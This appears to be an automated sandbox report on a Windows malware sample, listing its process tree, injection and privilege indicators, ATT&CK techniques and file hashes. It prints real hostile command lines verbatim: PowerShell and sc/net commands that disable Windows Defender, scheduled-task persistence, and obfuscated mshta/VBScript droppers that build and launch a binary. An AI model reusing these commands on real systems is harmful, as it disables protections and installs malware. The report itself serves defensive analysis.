ab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	build2.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe

pid	process
1836	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
1836	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3008
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe2BFE.exe399C.exe

pid process

1836 6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
3180 2BFE.exe
1552 399C.exe

pid	process
3008

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

5288.exepowershell.exeWerFault.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeDebugPrivilege	2176	5288.exe
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeRestorePrivilege	3780	WerFault.exe
Token: SeBackupPrivilege	3780	WerFault.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	3780	WerFault.exe
Token: SeIncreaseQuotaPrivilege	3604	powershell.exe
Token: SeSecurityPrivilege	3604	powershell.exe
Token: SeTakeOwnershipPrivilege	3604	powershell.exe
Token: SeLoadDriverPrivilege	3604	powershell.exe
Token: SeSystemProfilePrivilege	3604	powershell.exe
Token: SeSystemtimePrivilege	3604	powershell.exe
Token: SeProfSingleProcessPrivilege	3604	powershell.exe
Token: SeIncBasePriorityPrivilege	3604	powershell.exe
Token: SeCreatePagefilePrivilege	3604	powershell.exe
Token: SeBackupPrivilege	3604	powershell.exe
Token: SeRestorePrivilege	3604	powershell.exe
Token: SeShutdownPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeSystemEnvironmentPrivilege	3604	powershell.exe
Token: SeRemoteShutdownPrivilege	3604	powershell.exe
Token: SeUndockPrivilege	3604	powershell.exe
Token: SeManageVolumePrivilege	3604	powershell.exe
Token: 33	3604	powershell.exe
Token: 34	3604	powershell.exe
Token: 35	3604	powershell.exe
Token: 36	3604	powershell.exe
Token: SeIncreaseQuotaPrivilege	3604	powershell.exe
Token: SeSecurityPrivilege	3604	powershell.exe
Token: SeTakeOwnershipPrivilege	3604	powershell.exe
Token: SeLoadDriverPrivilege	3604	powershell.exe
Token: SeSystemProfilePrivilege	3604	powershell.exe
Token: SeSystemtimePrivilege	3604	powershell.exe
Token: SeProfSingleProcessPrivilege	3604	powershell.exe
Token: SeIncBasePriorityPrivilege	3604	powershell.exe
Token: SeCreatePagefilePrivilege	3604	powershell.exe
Token: SeBackupPrivilege	3604	powershell.exe
Token: SeRestorePrivilege	3604	powershell.exe
Token: SeShutdownPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeSystemEnvironmentPrivilege	3604	powershell.exe
Token: SeRemoteShutdownPrivilege	3604	powershell.exe
Token: SeUndockPrivilege	3604	powershell.exe
Token: SeManageVolumePrivilege	3604	powershell.exe
Token: 33	3604	powershell.exe
Token: 34	3604	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe2BFE.exe4806.exe5288.execmd.exe446C.exesys.exepowershell.exe

description	pid	process	target process
PID 968 wrote to memory of 1836	968	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
PID 968 wrote to memory of 1836	968	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
PID 968 wrote to memory of 1836	968	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
PID 968 wrote to memory of 1836	968	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
PID 968 wrote to memory of 1836	968	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
PID 968 wrote to memory of 1836	968	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe	6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
PID 3008 wrote to memory of 3648	3008		2BFE.exe
PID 3008 wrote to memory of 3648	3008		2BFE.exe
PID 3008 wrote to memory of 3648	3008		2BFE.exe
PID 3648 wrote to memory of 3180	3648	2BFE.exe	2BFE.exe
PID 3648 wrote to memory of 3180	3648	2BFE.exe	2BFE.exe
PID 3648 wrote to memory of 3180	3648	2BFE.exe	2BFE.exe
PID 3648 wrote to memory of 3180	3648	2BFE.exe	2BFE.exe
PID 3648 wrote to memory of 3180	3648	2BFE.exe	2BFE.exe
PID 3648 wrote to memory of 3180	3648	2BFE.exe	2BFE.exe
PID 3008 wrote to memory of 2872	3008		3749.exe
PID 3008 wrote to memory of 2872	3008		3749.exe
PID 3008 wrote to memory of 2872	3008		3749.exe
PID 3008 wrote to memory of 1552	3008		399C.exe
PID 3008 wrote to memory of 1552	3008		399C.exe
PID 3008 wrote to memory of 1552	3008		399C.exe
PID 3008 wrote to memory of 2884	3008		3C4C.exe
PID 3008 wrote to memory of 2884	3008		3C4C.exe
PID 3008 wrote to memory of 3904	3008		446C.exe
PID 3008 wrote to memory of 3904	3008		446C.exe
PID 3008 wrote to memory of 3904	3008		446C.exe
PID 3008 wrote to memory of 3428	3008		4806.exe
PID 3008 wrote to memory of 3428	3008		4806.exe
PID 3008 wrote to memory of 3428	3008		4806.exe
PID 3428 wrote to memory of 2416	3428	4806.exe	4806.exe
PID 3428 wrote to memory of 2416	3428	4806.exe	4806.exe
PID 3428 wrote to memory of 2416	3428	4806.exe	4806.exe
PID 3008 wrote to memory of 2020	3008		4DB5.exe
PID 3008 wrote to memory of 2020	3008		4DB5.exe
PID 3008 wrote to memory of 2020	3008		4DB5.exe
PID 3008 wrote to memory of 2176	3008		5288.exe
PID 3008 wrote to memory of 2176	3008		5288.exe
PID 3008 wrote to memory of 2176	3008		5288.exe
PID 2176 wrote to memory of 3024	2176	5288.exe	cmd.exe
PID 2176 wrote to memory of 3024	2176	5288.exe	cmd.exe
PID 2176 wrote to memory of 3024	2176	5288.exe	cmd.exe
PID 3024 wrote to memory of 1284	3024	cmd.exe	powershell.exe
PID 3024 wrote to memory of 1284	3024	cmd.exe	powershell.exe
PID 3024 wrote to memory of 1284	3024	cmd.exe	powershell.exe
PID 2176 wrote to memory of 820	2176	5288.exe	sys.exe
PID 2176 wrote to memory of 820	2176	5288.exe	sys.exe
PID 3904 wrote to memory of 3532	3904	446C.exe	AppLaunch.exe
PID 3904 wrote to memory of 3532	3904	446C.exe	AppLaunch.exe
PID 3904 wrote to memory of 3532	3904	446C.exe	AppLaunch.exe
PID 3904 wrote to memory of 3532	3904	446C.exe	AppLaunch.exe
PID 820 wrote to memory of 3604	820	sys.exe	powershell.exe
PID 820 wrote to memory of 3604	820	sys.exe	powershell.exe
PID 3428 wrote to memory of 2416	3428	4806.exe	4806.exe
PID 3428 wrote to memory of 2416	3428	4806.exe	4806.exe
PID 3428 wrote to memory of 2416	3428	4806.exe	4806.exe
PID 3428 wrote to memory of 2416	3428	4806.exe	4806.exe
PID 3428 wrote to memory of 2416	3428	4806.exe	4806.exe
PID 3904 wrote to memory of 3532	3904	446C.exe	AppLaunch.exe
PID 1284 wrote to memory of 3824	1284	powershell.exe	sc.exe
PID 1284 wrote to memory of 3824	1284	powershell.exe	sc.exe
PID 1284 wrote to memory of 3824	1284	powershell.exe	sc.exe
PID 1284 wrote to memory of 3076	1284	powershell.exe	cmd.exe
PID 1284 wrote to memory of 3076	1284	powershell.exe	cmd.exe
PID 1284 wrote to memory of 3076	1284	powershell.exe	cmd.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
2⤵
- Modifies data under HKEY_USERS
PID:2004

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
3⤵
PID:2924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
3⤵
PID:1680

C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
3⤵
PID:1740

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
3⤵
PID:2764

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
3⤵
PID:416

C:\Users\Admin\AppData\Local\Temp\6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
"C:\Users\Admin\AppData\Local\Temp\6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:968

C:\Users\Admin\AppData\Local\Temp\6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe
"C:\Users\Admin\AppData\Local\Temp\6df0a3efc6e374c2cce9f376c79a388a87089180c774c94d84bb89f3f608392d.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1836

C:\Users\Admin\AppData\Local\Temp\2BFE.exe
C:\Users\Admin\AppData\Local\Temp\2BFE.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3648

C:\Users\Admin\AppData\Local\Temp\2BFE.exe
C:\Users\Admin\AppData\Local\Temp\2BFE.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3180

C:\Users\Admin\AppData\Local\Temp\3749.exe
C:\Users\Admin\AppData\Local\Temp\3749.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2872

C:\Users\Admin\AppData\Local\Temp\399C.exe
C:\Users\Admin\AppData\Local\Temp\399C.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1552

C:\Users\Admin\AppData\Local\Temp\3C4C.exe
C:\Users\Admin\AppData\Local\Temp\3C4C.exe
1⤵
- Executes dropped EXE
PID:2884

C:\Users\Admin\AppData\Local\Temp\446C.exe
C:\Users\Admin\AppData\Local\Temp\446C.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 244
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Users\Admin\AppData\Local\Temp\4806.exe
C:\Users\Admin\AppData\Local\Temp\4806.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3428

C:\Users\Admin\AppData\Local\Temp\4806.exe
C:\Users\Admin\AppData\Local\Temp\4806.exe
2⤵
- Executes dropped EXE
PID:2416

C:\Users\Admin\AppData\Local\Temp\6666.exe
"C:\Users\Admin\AppData\Local\Temp\6666.exe"
3⤵
- Executes dropped EXE
PID:2700

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\6666.exe"
4⤵
PID:3328

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
5⤵
PID:1756

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
6⤵
- Creates scheduled task(s)
PID:1516

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
5⤵
PID:2472

C:\Users\Admin\AppData\Local\Temp\services64.exe
C:\Users\Admin\AppData\Local\Temp\services64.exe
6⤵
- Executes dropped EXE
PID:2864

C:\Users\Admin\AppData\Local\Temp\4DB5.exe
C:\Users\Admin\AppData\Local\Temp\4DB5.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2020

C:\Users\Admin\AppData\Local\Temp\5288.exe
C:\Users\Admin\AppData\Local\Temp\5288.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
4⤵
PID:3824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
4⤵
PID:3076

C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
4⤵
PID:3504

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
4⤵
PID:1848

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" start lsass
4⤵
PID:3800

C:\Users\Admin\AppData\Roaming\sys.exe
"C:\Users\Admin\AppData\Roaming\sys.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3604

C:\Users\Admin\AppData\Local\Temp\C2E7.exe
C:\Users\Admin\AppData\Local\Temp\C2E7.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2060

C:\Users\Admin\AppData\Local\Temp\C2E7.exe
C:\Users\Admin\AppData\Local\Temp\C2E7.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:1760

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\7c0d7ad7-3ebd-4b44-8d84-a1dfb91cbcd5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:3908

C:\Users\Admin\AppData\Local\Temp\C2E7.exe
"C:\Users\Admin\AppData\Local\Temp\C2E7.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2188

C:\Users\Admin\AppData\Local\Temp\C2E7.exe
"C:\Users\Admin\AppData\Local\Temp\C2E7.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
PID:968

C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build2.exe
"C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:396

C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build2.exe
"C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build2.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
PID:4060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build2.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:2412

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
8⤵
- Kills process with taskkill
PID:1848

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:3116

C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build3.exe
"C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build3.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2056

C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build3.exe
"C:\Users\Admin\AppData\Local\a22e44b0-2be5-452c-b5cd-ae5f51e4a81d\build3.exe"
6⤵
- Executes dropped EXE
PID:3504

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- Creates scheduled task(s)
PID:1068

C:\Users\Admin\AppData\Local\Temp\C8F2.exe
C:\Users\Admin\AppData\Local\Temp\C8F2.exe
1⤵
- Executes dropped EXE
PID:3856

C:\Users\Admin\AppData\Local\Temp\CB36.exe
C:\Users\Admin\AppData\Local\Temp\CB36.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im CB36.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CB36.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:1860

C:\Windows\SysWOW64\taskkill.exe
taskkill /im CB36.exe /f
3⤵
- Kills process with taskkill
PID:2876

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:1744

C:\Users\Admin\AppData\Local\Temp\CEA2.exe
C:\Users\Admin\AppData\Local\Temp\CEA2.exe
1⤵
- Executes dropped EXE
PID:596

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRipt:clOSe( creaTEObJecT ("WsCRiPT.sheLL"). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\CEA2.exe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\CEA2.exe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )
2⤵
PID:1740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\CEA2.exe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "" == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\CEA2.exe" ) do taskkill -IM "%~NxN" /f
3⤵
PID:1432

C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe
wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y
4⤵
- Executes dropped EXE
PID:3724

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRipt:clOSe( creaTEObJecT ("WsCRiPT.sheLL"). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF ""/p4nbpeM1nqd~Rrsm~Y "" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )
5⤵
PID:3124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "/p4nbpeM1nqd~Rrsm~Y " == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" ) do taskkill -IM "%~NxN" /f
6⤵
PID:3804

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRiPt:cLose (cReateOBjECt ( "wscript.ShElL" ). RUN ("CmD /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = ""MZ"" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D & sTARt msiexec /y .\NXXHJC.d &deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r " , 0 , tRue ))
5⤵
PID:2184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = "MZ" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D& sTARt msiexec /y .\NXXHJC.d &deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r
6⤵
PID:3760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ecHO "
7⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>OuVq.r"
7⤵
PID:1176

C:\Windows\SysWOW64\msiexec.exe
msiexec /y .\NXXHJC.d
7⤵
- Loads dropped DLL
PID:4040

C:\Windows\SysWOW64\taskkill.exe
taskkill -IM "CEA2.exe" /f
4⤵
- Kills process with taskkill
PID:2028

C:\Users\Admin\AppData\Local\Temp\CF4E.exe
C:\Users\Admin\AppData\Local\Temp\CF4E.exe
1⤵
- Executes dropped EXE
PID:1256

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1368

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
- Executes dropped EXE
PID:1348

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
3⤵
- Creates scheduled task(s)
PID:1360

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5
50d9d5311b74576fbbb5c9f204fdc16b

SHA1
7dd97b713e33f287440441aa3bb7966a2cb68321

SHA256
d76a71e8dfd6961d4912a23b2fd207f2a93c67523dfcda252358eafa5821b2ad

SHA512
67d02ce79bb8fd641783ba12ab5587900a03416627939084ce87f22b42ca7d50765947e2238b3c6a70a74bce3c9233b486aaa10feb57e714646e4d02c0c926c0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
8f19b97ffda28eb06efc2181fd126b9c

SHA1
142443021d6ffaf32d3d60635d0edf540a039f2e

SHA256
49607d1b931a79642c5268292b4f16f2db7ec77b53f8abddbc0cce36ed88e3f7

SHA512
6577704c531cc07d1ae8d61dfe6d8735d29d1386038fa9e3f5580c80c30dc04570ec0160f51903d05b180c4af68f0eb8e23e2106c3bb367afd32d033aae031e6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E71BF9BF847F24881CE6680EA97ACE55
MD5
d26c6875996467802bc240ad0fb9192b

SHA1
dadacde345bf3b8c8ba9ece661846cb8653f5b07

SHA256
c9a8005f47f023410249c4fae8ae8e5e303aa3df746e3d2fe64caecd402fba94

SHA512
7e3c8db3b3a79c0a0b358fb54009d55136d491a11e8779772db0233e0d16d57f5afbeb02aa6a510f36c949266032035b2de3874fdb3b24c6f05a980520c27c62

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5
37aaa3d8d2f228874401bf2ede707099

SHA1
bc7bcab4fcfd8a8b40acf5e351319ae561373203

SHA256
39558b067e708fd1bfc258bdd8b667152b23f745376c4d8d79cd5f264bbf1965

SHA512
50d282624abb2fa62efd990ea408a07e24525233bdd6e1db96e5dc4f190ba79e73350d963d873ae2caab3a778ad8403e7626564ffdd7e9fdbdd9eb8669cc3118

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
c763df312d5662135aac5e0bbea64586

SHA1
223f606a8600d14105b4c38802b200519f9d6450

SHA256
fcb5438c230caa6eda418123f4a5beaf610d0ddbf0a148b219b179ffcf0ac7b7

SHA512
23367276982640b57f28cb28ed36ac1e0e06d0c064781a9217ddc983bbccf82b05a034db85976517f10e5fce4bee8666425977c3d05b849b8c270cc2dfb927c5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
0e2bf91e4edf1022e64e4170e224fd9d

SHA1
d5a1e7dbceae2d1099fa6f958cbf628d4fc6b38f

SHA256
3b7ea6c6189f542994c096f2c557ebcce4e312295961d80a1f05fccb7f590075

SHA512
